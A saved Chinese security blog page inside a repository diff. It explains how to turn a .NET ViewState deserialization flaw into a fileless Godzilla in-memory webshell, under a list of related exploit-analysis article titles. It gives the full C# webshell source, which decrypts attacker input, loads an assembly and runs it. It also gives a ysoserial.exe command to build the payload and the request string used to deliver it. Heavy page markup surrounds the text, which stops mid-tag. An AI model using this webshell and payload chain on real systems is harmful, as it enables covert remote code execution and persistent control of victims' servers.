var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-color);--button-box-sha
-												add 漏洞分析、挖掘、IOT安全、红蓝攻防等相关文章

CC链再次挖掘
CVE-2024-36401 GeoServer远程代码执行
CobaltStrike(4.9.1)的狩猎与反狩猎 · Arui's blog
DIR-820 CVE-2022-26258漏洞复现
GeoServer Property evalute 远程代码执行漏洞 (CVE-2024-36401) 分析
GeoServer property RCE注入内存马
GeoServer历史漏洞分析-CSDN博客
ICMP_DNS 隧道处置方法 _ Linux 应急响应
ICMP_DNS 隧道处置方法 _ Windows 应急响应
_.Net ViewState反序列化实现无文件哥斯拉内存马(万户ezEip)
nginx deny限制路径绕过
从jhttpd分析到系统命令注入(CVE-2021-46227-D-Link Di-7200G 命令注入漏洞)
契约锁代码审计分析-CSDN博客
宏景eHR人力系统的代码审计(权限绕过_downlawbase注入_任意文件删除下载_反序列化RCE)
帆软channel v5反序列化绕过
帆软channel反序列化漏洞分析
某凌 EKP 前台远程命令执行漏洞分析
某园区系统登录绕过分析(大华智慧园区综合管理平台-登录绕过_ZIP上传目录穿越)
深入解析PHP CGI Windows平台远程代码执行漏洞（CVE-2024-4577_CVE-2012-1823）
漏洞挖掘之再探某园区系统(大华智慧园区综合管理平台—未授权用户添加_查看_修改_xstream反序列化RCE)
记某大学智慧云平台存在弱口令爆破_水平越权信息泄露_Wx_SessionKey篡改 任意用户登录漏洞

											
										
										
											2024-08-16 06:00:47 -07:00
+								<!DOCTYPE html> <html lang=zh-CN style><!--
 								 Page saved with SingleFile
 								 url: https://blog.wanghw.cn/security/dotnet-viewstate-no-file-godzilla-memshell.html
 								--><meta charset=utf-8><meta name=viewport content="width=device-width, initial-scale=1"><link rel=profile href=https://gmpg.org/xfn/11><title>.Net ViewState反序列化实现无文件哥斯拉内存马 – Whwlsfb's Tech Blog</title><meta name=robots content=max-image-preview:large><link rel=alternate type=application/rss+xml title="Whwlsfb's Tech Blog » Feed" href=https://blog.wanghw.cn/feed><link rel=alternate type=application/rss+xml title="Whwlsfb's Tech Blog » 评论 Feed" href=https://blog.wanghw.cn/comments/feed><link rel=alternate type=application/rss+xml title="Whwlsfb's Tech Blog » .Net ViewState反序列化实现无文件哥斯拉内存马 评论 Feed" href=https://blog.wanghw.cn/security/dotnet-viewstate-no-file-godzilla-memshell.html/feed><style>:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}@media(min-width:782px){}@media(max-width:781px){}@media(min-width:782px){}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}:where(.wp-block-post-comments input[type=submit]){border:0}@supports(position:sticky){.wp-block-cover-image:after,.wp-block-cover:after{content:none}}@supports(-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media(prefers-reduced-motion:reduce){}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}:where(.wp-block-file){margin-bottom:1.5em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}@media(min-width:600px){}@media(min-width:600px){}.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}.wp-block-image .aligncenter{display:table}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}@supports((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url(data:image/svg+xml;utf8,<svg\ viewBox=\"0\ 0\ 100\ 100\"\ xmlns=\"http://www.w3.org/2000/svg\"><circle\ cx=\"50\"\ cy=\"50\"\ r=\"50\"\/><\/svg>);mask-image:url(data:image/svg+xml;utf8,<svg\ viewBox=\"0\ 0\ 100\ 100\"\ xmlns=\"http://www.w3.org/2000/svg\"><circle\ cx=\"50\"\ cy=\"50\"\ r=\"50\"\/><\/svg>);mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}.wp-block-image :where(.has-border-color){border-style:solid}.wp-block-image :where([style*=border-top-color]){border-top-style:solid}.wp-block-image :where([style*=border-right-color]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-color]){border-left-style:solid}.wp-block-image :where([style*=border-width]){border-style:solid}.wp-block-image :where([style*=border-top-width]){border-top-style:solid}.wp-block-image :where([style*=border-right-width]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-width]){border-left-style:solid}.wp-block-image figure{margin:0}@media(prefers-reduced-motion:no-preference){}@keyframes turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom
 								 * Waves v0.7.5
 								 * http://fian.my.id/Waves
 								 *
 								 * Copyright 2014-2016 Alfiana E. Sibuea and other contributors
 								 * Released under the MIT license
 								 * https://github.com/fians/Waves/blob/master/LICENSE
 								 */</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
 								&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
 								&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
 								&lt;head runat="server"&gt;
 								 &lt;title&gt;&lt;/title&gt;
 								&lt;/head&gt;
 								&lt;body&gt;
 								 &lt;form id="form1" runat="server"&gt;
 								 &lt;div&gt;
 								 &lt;asp:Literal ID="ltUserName" runat="server"&gt;&lt;/asp:Literal&gt;
 								 &lt;/div&gt;
 								 &lt;/form&gt;
 								&lt;/body&gt;
 								&lt;/html&gt;</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=html data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>&lt;%@ Page Language="C#" AutoEventWireup="true" CodeFile="success.aspx.cs" Inherits="member_success" %&gt;
 								&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
 								&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
 								&lt;head runat="server"&gt;
 								    &lt;title&gt;&lt;/title&gt;
 								&lt;/head&gt;
 								&lt;body&gt;
 								    &lt;form id="form1" runat="server"&gt;
 								    &lt;div&gt;
 								        &lt;asp:Literal ID="ltUserName" runat="server"&gt;&lt;/asp:Literal&gt;
 								    &lt;/div&gt;
 								    &lt;/form&gt;
 								&lt;/body&gt;
 								&lt;/html&gt;</pre><p id=ufb441563>这个页面非常简单，可以作为完美的特征案例，其中的关键点则是<code>&lt;form id="form1" runat="server"&gt;</code>，其中的<code>runat="server"</code>是必不可少的，这个属性标识了这个form将会支持ASP.net MVC的高级组件，将由服务端来处理、保存状态，并且进行额外的解析操作。<p id=u8021fab0>下一步则需要提取页面中的<code>VIEWSTATEGENERATOR</code>，通常直接访问该页面即可获得。<div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-xml enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-k9>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>html</span><span class=enlighter-text> </span><span class=enlighter-x2>xmlns</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"http://www.w3.org/1999/xhtml"</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>head</span><span class=enlighter-g1>&gt;</span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>title</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;/</span><span class=enlighter-x1>title</span><span class=enlighter-g1>&gt;</span><span class=enlighter-g1>&lt;/</span><span class=enlighter-x1>head</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>body</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>    </span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>form</span><span class=enlighter-text> </span><span class=enlighter-x2>method</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"post"</span><span class=enlighter-text> </span><span class=enlighter-x2>action</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"./success.aspx"</span><span class=enlighter-text> </span><span class=enlighter-x2>id</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"form1"</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>div</span><span class=enlighter-text> </span><span class=enlighter-x2>class</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"aspNetHidden"</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>&lt;</span><span class=enlighter-x1>input</span><span class=enlighter-text> </span><span class=enlighter-x2>type</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"hidden"</span><span class=enlighter-text> </span><span class=enlighter-x2>name</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"__VIEWSTATE"</span><span class=enlighter-text> </span><span class=enlighter-x2>id</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"__VIEWSTATE"</span><span class=enlighter-text> </span><span class=enlighter-x2>value</span><span class=enlighter-k3>=</span><span class=enlighter-s0>"/wEPDwUIOTEyNDUzNDYPZBYCAgMPZBYCAgEPFgIeBFRleHQFJ+mqjOivgeWksei0pe+8geeUqOaIt++8muOAkOOAkeS4jeWtmOWcqGRkxr5FwhfEZkCmaPJLiXPKeRsulN0="</span><span class=enlighter-g1>&gt;</span><span class=enlighter-text></s
 								&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
 								&lt;head&gt;&lt;title&gt;
 								&lt;/title&gt;&lt;/head&gt;
 								&lt;body&gt;
 								 &lt;form method="post" action="./success.aspx" id="form1"&gt;
 								&lt;div class="aspNetHidden"&gt;
 								&lt;input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTEyNDUzNDYPZBYCAgMPZBYCAgEPFgIeBFRleHQFJ+mqjOivgeWksei0pe+8geeUqOaIt++8muOAkOOAkeS4jeWtmOWcqGRkxr5FwhfEZkCmaPJLiXPKeRsulN0="&gt;
 								&lt;/div&gt;
 								&lt;div class="aspNetHidden"&gt;
 								&lt;input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="60AF4XXX"&gt;
 								&lt;/div&gt;
 								 &lt;div&gt;
 								 验证失败！用户：【】不存在
 								 &lt;/div&gt;
 								 &lt;/form&gt;
 								&lt;/body&gt;
 								&lt;/html&gt;</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=html data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
 								&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
 								&lt;head&gt;&lt;title&gt;
 								&lt;/title&gt;&lt;/head&gt;
 								&lt;body&gt;
 								    &lt;form method="post" action="./success.aspx" id="form1"&gt;
 								&lt;div class="aspNetHidden"&gt;
 								&lt;input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTEyNDUzNDYPZBYCAgMPZBYCAgEPFgIeBFRleHQFJ+mqjOivgeWksei0pe+8geeUqOaIt++8muOAkOOAkeS4jeWtmOWcqGRkxr5FwhfEZkCmaPJLiXPKeRsulN0="&gt;
 								&lt;/div&gt;
 								&lt;div class="aspNetHidden"&gt;
 								&lt;input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="60AF4XXX"&gt;
 								&lt;/div&gt;
 								    &lt;div&gt;
 								        验证失败！用户：【】不存在
 								    &lt;/div&gt;
 								    &lt;/form&gt;
 								&lt;/body&gt;
 								&lt;/html&gt;</pre><p id=u022d2601>可见该页面的的<code>VIEWSTATEGENERATOR</code>为<code>60AF4XXX</code>，下一步进行Payload生成。<h2 class=wp-block-heading id=c0b82f49>Payload构造</h2><p id=u3acd28be>从<a href=#devco-blog>devco的文章</a>中提到的构造方式为构造一个简单的命令执行回显马然后使用yso.net的ActivitySurrogateSelectorFromFile链生成payload，但是既然能执行任意代码了，构造一个内存马也是同样可以的。<blockquote class=wp-block-quote><p>从.NET 4.8 版本开始，默认开启了类型检查，如出现类型转换错误，则需要使用 ActivitySurrogateDisableTypeCheck链进行 Patch 绕过，绕过后才能正常使用下文中提到的Payload。</p></blockquote><p>通过编写哥斯拉的专用代码，生成序列化数据，携带在请求包之中，便可实现无实体 文件、无内存痕迹的哥斯拉内存马。<p id=ua78d4db8>哥斯拉的内存马的payload代码：<div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-csharp enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-k0>class</span><span class=enlighter-text> d</span></div></div><div><div><span class=enlighter-text></span><span class=enlighter-g1>{</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>    </span><span class=enlighter-k0>public</span><span class=enlighter-text> </span><span class=enlighter-m0>d</span><span class=enlighter-g1>()</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>    </span><span class=enlighter-g1>{</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>        System.</span><span class=enlighter-m3>Web</span><span class=enlighter-text>.</span><span class=enlighter-m3>HttpContext</span><span class=enlighter-text> Context = System.</span><span class=enlighter-m3>Web</span><span class=enlighter-text>.</span><span class=enlighter-m3>HttpContext</span><span class=enlighter-text>.</span><span class=enlighter-m3>Current</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>        Context.</span><span class=enlighter-m3>Server</span><span class=enlighter-text>.</span><span class=enlighter-m3>ClearError</span><span class=enlighter-g1>()</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>        Context.</span><span class=enlighter-m3>Response</span><span class=enlighter-text>.</span><span class=enlighter-m3>Clear</span><span class=enlighter-g1>()</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>        </span><span class=enlighter-k1>try</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>        </span><span class=enlighter-g1>{</span><span class=enlighter-text></span></div></div><div><div><span class=enlighter-text>            </span><span class=enlighter-k5>string</span><span class=enlighter-text> key = </span><span class=enlighter-s0>"3c6e0b8a9c15224a"</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>            </span><span class=enlighter-k5>string</span><span class=enlighter-text> pass = </span><span class=enlighter-s0>"pas"</span><span class=enlighter-text>;</span></div></div><div><div><span class=enlighter-text>            </span><span class=enlighter-k5>string</span><span class=enlighter-text> md5 = System.</span><span class=enlighter-m3>BitConverter</span><span class=enlighter-text>.</span><span class=enlighter-m3>ToString</span><span class=enlighter-g1>(</span><span class=enlighter-k3>new</span><span class=enlighter-text> System.</span><span class=enlighter-m3>Security</span><span class=enlighter-text>.</span><span class=enlighter-m3>Cryptography</span><span class=enlighter-text>.</span><span class=enlighter-m3>MD5CryptoServiceProvider</span><span class=enlighter-g1
 								{
 								 public d()
 								 {
 								 System.Web.HttpContext Context = System.Web.HttpContext.Current;
 								 Context.Server.ClearError();
 								 Context.Response.Clear();
 								 try
 								 {
 								 string key = "3c6e0b8a9c15224a";
 								 string pass = "pas";
 								 string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");
 								 byte[] data = System.Convert.FromBase64String(Context.Request[pass]);
 								 data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);
 								 if (Context.Session["payload"] == null)
 								 {
 								 Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });
 								 }
 								 else
 								 {
 								 System.IO.MemoryStream outStream = new System.IO.MemoryStream();
 								 object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY");
 								 o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString();
 								 byte[] r = outStream.ToArray();
 								 Context.Response.Write(md5.Substring(0, 16));
 								 Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));
 								 }
 								 }
 								 catch (System.Exception) { }
 								 Context.Response.Flush();
 								 Context.Response.End();
 								 }
 								}</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=csharp data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>class d
 								{
 								    public d()
 								    {
 								        System.Web.HttpContext Context = System.Web.HttpContext.Current;
 								        Context.Server.ClearError();
 								        Context.Response.Clear();
 								        try
 								        {
 								            string key = "3c6e0b8a9c15224a";
 								            string pass = "pas";
 								            string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");
 								            byte[] data = System.Convert.FromBase64String(Context.Request[pass]);
 								            data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);
 								            if (Context.Session["payload"] == null)
 								            {
 								                Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });
 								            }
 								            else
 								            {
 								                System.IO.MemoryStream outStream = new System.IO.MemoryStream();
 								                object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY");
 								                o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString();
 								                byte[] r = outStream.ToArray();
 								                Context.Response.Write(md5.Substring(0, 16));
 								                Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));
 								            }
 								        }
 								        catch (System.Exception) { }
 								        Context.Response.Flush();
 								        Context.Response.End();
 								    }
 								}</pre><p>保存该文件至本地，然后使用如下命令生成payload。<div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-shell enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-text>ysoserial.exe -g ActivitySurrogateSelectorFromFile -p ViewState --decryptionalg=</span><span class=enlighter-s0>"3DES"</span><span class=enlighter-text> -c=</span><span class=enlighter-s0>"123"</span><span class=enlighter-text> --decryptionkey=</span><span class=enlighter-s0>"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"</span><span class=enlighter-text>  --validationalg=</span><span class=enlighter-s0>"SHA1"</span><span class=enlighter-text> --validationkey=</span><span class=enlighter-s0>"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"</span><span class=enlighter-text> --generator=60AF4XXX -c </span><span class=enlighter-s0>"CHANGEME.cs;System.Web.dll;System.dll"</span></div></div></div><div class="enlighter-raw sf-hidden">ysoserial.exe -g ActivitySurrogateSelectorFromFile -p ViewState --decryptionalg="3DES" -c="123" --decryptionkey="XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" --validationalg="SHA1" --validationkey="BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" --generator=60AF4XXX -c "CHANGEME.cs;System.Web.dll;System.dll"</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=shell data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>ysoserial.exe -g ActivitySurrogateSelectorFromFile -p ViewState --decryptionalg="3DES" -c="123" --decryptionkey="XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"  --validationalg="SHA1" --validationkey="BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" --generator=60AF4XXX -c "CHANGEME.cs;System.Web.dll;System.dll"</pre><p>通过使用输出的payload进行拼接，<strong>注意最后的&amp;不能漏掉</strong><div class="enlighter-default enlighter-v-standard enlighter-t-atomic enlighter-l-raw enlighter-linenumbers enlighter-overflow-scroll"><div class="enlighter-toolbar-top enlighter-toolbar sf-hidden"></div><div class=enlighter-code><div class=enlighter><div><div><span class=enlighter-text>__VIEWSTATE=&lt;yso生成的内容&gt;&amp;__VIEWSTATEGENERATOR=60AF4XXX&amp;</span></div></div></div><div class="enlighter-raw sf-hidden">__VIEWSTATE=&lt;yso生成的内容&gt;&amp;__VIEWSTATEGENERATOR=60AF4XXX&amp;</div></div><div class="enlighter-toolbar-bottom enlighter-toolbar sf-hidden"></div></div><pre class="EnlighterJSRAW enlighter-origin sf-hidden" data-enlighter-language=raw data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>__VIEWSTATE=&lt;yso生成的内容&gt;&amp;__VIEWSTATEGENERATOR=60AF4XXX&amp;</pre><p>填写至哥斯拉的请求配置中的“左边追加数据”中。<div class=wp-block-image><figure class="aligncenter size-full"><img fetchpriority=high decoding=async width=734 height=780 